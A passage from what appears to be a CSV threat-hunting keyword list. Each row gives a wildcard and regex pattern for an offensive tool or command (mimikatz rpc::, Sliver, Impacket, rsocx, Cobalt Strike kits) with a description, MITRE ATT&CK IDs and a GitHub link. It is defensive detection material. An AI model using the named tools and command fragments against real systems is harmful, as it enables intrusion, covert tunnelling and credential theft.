T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*rottenpotato.x86.dll*",".{0,1000}rottenpotato\.x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*RottenPotatoVulnerable.txt*",".{0,1000}RottenPotatoVulnerable\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*routerpasswords.com/*",".{0,1000}routerpasswords\.com\/.{0,1000}","offensive_tool_keyword","routerpasswords.com","find default routers passwords","T1110.003 - T1200","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","1","N/A","N/A","10","1026","137","2024-04-30T15:57:18Z","2021-08-16T17:34:25Z" "*routers_userpass.txt*",".{0,1000}routers_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*routersploit*",".{0,1000}routersploit.{0,1000}","offensive_tool_keyword","routersploit","The RouterSploit Framework is an open-source exploitation framework dedicated to embedded devices.exploits","T1210.001 - T1190 - T1213 - T1189","TA0007 - TA0002 - TA0001 - TA0011","N/A","N/A","Frameworks","https://github.com/threat9/routersploit","1","1","N/A","N/A","10","11878","2305","2024-04-14T13:58:13Z","2016-03-30T11:43:12Z" "*rpc.Merlin.Exe*",".{0,1000}rpc\.Merlin\.Exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*rpc.Merlin.RunAs*",".{0,1000}rpc\.Merlin\.RunAs.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*rpc://* -rpc-mode ICPR -icpr-ca-name *",".{0,1000}rpc\:\/\/.{0,1000}\s\-rpc\-mode\sICPR\s\-icpr\-ca\-name\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*rpc::close*",".{0,1000}rpc\:\:close.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*rpc::connect*",".{0,1000}rpc\:\:connect.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*rpc::enum*",".{0,1000}rpc\:\:enum.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*rpc::server*",".{0,1000}rpc\:\:server.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*rpcattack.py*",".{0,1000}rpcattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*rpcattack.py*",".{0,1000}rpcattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*rpc-backdoor.go*",".{0,1000}rpc\-backdoor\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*rpc-beacons.go*",".{0,1000}rpc\-beacons\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*rpcdump.py * | grep MS-RPRN*",".{0,1000}rpcdump\.py\s.{0,1000}\s\|\sgrep\sMS\-RPRN.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","10","7","689","109","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z" "*rpcdump.py*",".{0,1000}rpcdump\.py.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","1","N/A","7","1","76","7","2023-12-15T10:49:39Z","2023-12-14T14:31:05Z" "*rpcdump.py*",".{0,1000}rpcdump\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*rpcdump_check*",".{0,1000}rpcdump_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*rpc-hijack.go*",".{0,1000}rpc\-hijack\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*rpc-kill.go*",".{0,1000}rpc\-kill\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*rpcmap.py*",".{0,1000}rpcmap\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*rpc-msf.go*",".{0,1000}rpc\-msf\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*rpcrelayclient.*",".{0,1000}rpcrelayclient\..{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*rpcrelayclient.py*",".{0,1000}rpcrelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*rpcrt4_new.dll*",".{0,1000}rpcrt4_new\.dll.{0,1000}","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/websecnl/CVE-2022-26809","1","1","N/A","N/A","1","30","3","2022-04-19T17:04:04Z","2022-04-14T08:12:24Z" "*rpcrt4_old.dll",".{0,1000}rpcrt4_old\.dll","offensive_tool_keyword","POC","Remote Code Execution Exploit in the RPC Library CVE-2022-26809","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/websecnl/CVE-2022-26809","1","1","N/A","N/A","1","30","3","2022-04-19T17:04:04Z","2022-04-14T08:12:24Z" "*rpc-shellcode.go*",".{0,1000}rpc\-shellcode\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*rpivot.zip*",".{0,1000}rpivot\.zip.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","533","123","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*rpivot-master*",".{0,1000}rpivot\-master.{0,1000}","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","1","N/A","10","10","533","123","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z" "*rpm.torproject.org/*public_gpg.key*",".{0,1000}rpm\.torproject\.org\/.{0,1000}public_gpg\.key.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*rsactftool --*",".{0,1000}rsactftool\s\-\-.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*rsactftool* --dumpkey --key *",".{0,1000}rsactftool.{0,1000}\s\-\-dumpkey\s\-\-key\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*rshijack*",".{0,1000}rshijack.{0,1000}","offensive_tool_keyword","rshijack","tcp connection hijacker. rust rewrite of shijack from 2001. This was written for TAMUctf 2018. brick house 100. The target was a telnet server that was protected by 2FA. Since the challenge wasn't authenticated. there have been multiple solutions for this. Our solution (cyclopropenylidene) was waiting until the authentication was done. then inject a tcp packet into the telnet connection:","T1195 - T1565.001 - T1565.002 - T1574 - T1573 - T1071.004","TA0011 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/kpcyrd/rshijack","1","0","N/A","N/A","5","433","41","2024-02-10T20:36:55Z","2018-02-23T02:21:45Z" "*rsmudge/ElevateKit*",".{0,1000}rsmudge\/ElevateKit.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*rsockstun -*",".{0,1000}rsockstun\s\-.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/llkat/rsockstun","1","0","N/A","10","10","43","19","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z" "*rsockstun-1.1.zip*",".{0,1000}rsockstun\-1\.1\.zip.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/llkat/rsockstun","1","1","N/A","10","10","43","19","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z" "*rsockstun-master*",".{0,1000}rsockstun\-master.{0,1000}","offensive_tool_keyword","rsockstun","reverse socks tunneler with ntlm and proxy support","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/llkat/rsockstun","1","1","N/A","10","10","43","19","2022-08-09T09:25:50Z","2018-10-17T09:51:11Z" "*rsocx -l 0.0.0.0*",".{0,1000}rsocx\s\-l\s0\.0\.0\.0.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*rsocx -r *:*",".{0,1000}rsocx\s\-r\s.{0,1000}\:.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*rsocx -t 0.0.0.0*",".{0,1000}rsocx\s\-t\s0\.0\.0\.0.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*rsocx.exe* 0.0.0.0*",".{0,1000}rsocx\.exe.{0,1000}\s0\.0\.0\.0.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*rsocx.exe* 127.0.0.1*",".{0,1000}rsocx\.exe.{0,1000}\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","0","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*rsocx-main.zip*",".{0,1000}rsocx\-main\.zip.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*rtcrowley/Offensive-Netsh-Helper*",".{0,1000}rtcrowley\/Offensive\-Netsh\-Helper.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","1","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z" "*RtlDallas/Jomungand*",".{0,1000}RtlDallas\/Jomungand.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","1","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "*RtlDallas/KrakenMask*",".{0,1000}RtlDallas\/KrakenMask.{0,1000}","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","9","3","217","37","2023-11-29T21:58:34Z","2023-08-05T19:24:36Z" "*RU5EVEhJU0ZJTEVUUkFOU01JU1NJT05FR1JFU1NBU1NFU1M=*",".{0,1000}RU5EVEhJU0ZJTEVUUkFOU01JU1NJT05FR1JFU1NBU1NFU1M\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" 